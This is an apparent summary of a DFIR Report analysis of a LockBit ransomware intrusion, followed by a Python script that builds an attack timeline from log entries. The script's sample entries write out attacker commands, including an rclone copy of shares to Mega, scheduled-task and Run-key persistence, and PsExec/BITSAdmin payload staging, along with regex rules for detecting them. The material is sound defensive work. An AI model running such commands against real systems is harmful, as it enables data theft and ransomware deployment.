
Source: The DFIR Report
A recent investigation by The DFIR Report unveiled a sophisticated ransomware operation leveraging Cobalt Strike beacons and proxy tools like SystemBC and GhostSOCKS to deploy LockBit ransomware, one of today’s most prevalent ransomware variants.
The attack began in late January 2024 when a user inadvertently downloaded a malicious file named setup_wm.exe, disguised as the legitimate Microsoft Windows Media Configuration Utility. Upon execution, the file triggered a Cobalt Strike beacon, initiating outbound connections to command-and-control (C2) servers. Within 30 minutes, the beacon executed domain reconnaissance commands such as nltest to locate domain controllers.
Using elevated permissions, the attackers deployed two proxy tools, SystemBC and GhostSOCKS, to the domain controller. While Windows Defender successfully blocked GhostSOCKS, SystemBC remained active, providing a stable C2 channel. The attackers used PowerShell commands to reinforce persistence, injected malicious code into trusted processes such as WUAUCLT.exe, and extracted credentials from LSASS.
Persistence mechanisms included scheduled tasks and registry run keys. The attackers configured these tasks to maintain the execution of their malicious proxies. “We identified multiple scheduled tasks across several systems within the environment,” noted the report.
Within an hour of the initial breach, the attackers moved laterally to a file server, deploying a new Cobalt Strike beacon linked to a separate C2 server. Remote services and SMB facilitated their movements, allowing the deployment of additional proxy tools. This pivoting gave the attackers a second foothold in the compromised network, independent of the first beacon.
The attackers initially experimented with smaller data exfiltration attempts using tools like Internet Explorer and temporary file-sharing sites. However, they later turned to Rclone for large-scale exfiltration. Early attempts to use FTP servers failed, prompting the attackers to utilize Mega.io for storing stolen data. Over 16 hours, several gigabytes of sensitive information were siphoned off.
Eleven days into the intrusion, the attackers executed their ultimate goal: ransomware deployment. The operation was carefully staged, with the backup server acting as the central hub for launching the LockBit payload. Tools such as PsExec, WMI, and BITSAdmin were used to distribute and execute the ransomware across all accessible Windows hosts.
The final attack achieved a Time to Ransomware (TTR) of 239 hours. Despite encountering errors during execution, the attackers successfully encrypted the network and left ransom notes on the compromised systems, demanding payment for data recovery.
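The stages summarised above (nltest reconnaissance, scheduled-task and Run-key persistence, Rclone exfiltration, BITSAdmin/PsExec deployment, and the Time to Ransomware figure) can be pulled out of endpoint telemetry with a small hunting script. The following is an added example, not code from The DFIR Report; the Sysmon-style log lines, host names, paths and timestamps are constructed (the timestamps are chosen so the computed TTR matches the report's 239 hours), and the pattern rules are this example's own, keyed to the tools the report names.

```python
import re
from datetime import datetime, timezone

# Constructed Sysmon-style process events mirroring the stages the report describes;
# hosts, users, paths and timestamps are made up, not the report's telemetry.
SAMPLE_EVENTS = [
    r"2024-01-29T09:02:11Z host=ws01 user=jdoe image=C:\Users\jdoe\Downloads\setup_wm.exe cmd=setup_wm.exe",
    r"2024-01-29T09:31:40Z host=ws01 user=jdoe image=C:\Windows\System32\nltest.exe cmd=nltest /dclist:corp",
    r"2024-01-29T10:05:02Z host=dc01 user=SYSTEM image=C:\Windows\System32\schtasks.exe cmd=schtasks /create /tn Updater /tr C:\ProgramData\svc.exe /sc onstart",
    r"2024-01-29T10:06:15Z host=dc01 user=SYSTEM image=C:\Windows\System32\reg.exe cmd=reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svc /d C:\ProgramData\svc.exe",
    r"2024-01-30T14:12:09Z host=fs01 user=admin image=C:\Temp\rclone.exe cmd=rclone copy D:\Shares mega:backup",
    r"2024-02-08T08:02:11Z host=bk01 user=admin image=C:\Windows\System32\bitsadmin.exe cmd=bitsadmin /transfer j \\bk01\share\lb.exe C:\Windows\Temp\lb.exe",
    r"2024-02-08T08:03:30Z host=bk01 user=admin image=C:\Tools\PsExec.exe cmd=psexec \\ws02 -s C:\Windows\Temp\lb.exe",
]

EVENT_RE = re.compile(r"^(\S+) host=(\S+) user=(\S+) image=(\S+) cmd=(.*)$")

# Intrusion stage -> patterns over "image cmd", keyed to the tools the report names (example's own rules).
STAGE_RULES = {
    "initial_access": [r"(?i)setup_wm\.exe"],                          # masqueraded dropper name
    "recon": [r"(?i)\bnltest(\.exe)?\b"],                               # domain controller discovery
    "persistence": [r"(?i)schtasks(\.exe)?\s+/create",                  # scheduled task creation
                    r"(?i)reg(\.exe)?\s+add\s+.*CurrentVersion\\Run"],  # registry Run key
    "exfiltration": [r"(?i)\brclone(\.exe)?\b"],                        # bulk copy to cloud storage
    "deployment": [r"(?i)\b(bitsadmin|psexec|wmic)(\.exe)?\b"],         # ransomware staging/execution
}

def parse_event(line):
    """Parse one log line into a dict, or return None for lines that do not fit the format."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    ts, host, user, image, cmd = m.groups()
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"ts": when, "host": host, "user": user, "image": image, "cmd": cmd}

def classify(event):
    """Return every stage whose patterns match the event's image path or command line."""
    target = f"{event['image']} {event['cmd']}"
    return [stage for stage, pats in STAGE_RULES.items() if any(re.search(p, target) for p in pats)]

def build_timeline(lines):
    """Chronological list of (timestamp, stage, host, image) findings."""
    findings = []
    for ev in filter(None, map(parse_event, lines)):
        findings.extend((ev["ts"], stage, ev["host"], ev["image"]) for stage in classify(ev))
    return sorted(findings)

def time_to_ransomware_hours(findings):
    """Hours from the first initial_access finding to the first deployment finding, or None."""
    first = {}
    for ts, stage, _, _ in findings:   # findings are sorted, so setdefault keeps the earliest
        first.setdefault(stage, ts)
    if "initial_access" not in first or "deployment" not in first:
        return None
    return (first["deployment"] - first["initial_access"]).total_seconds() / 3600
```

On the constructed sample the timeline runs initial_access, recon, two persistence hits, exfiltration and two deployment hits, and `time_to_ransomware_hours` returns 239.0.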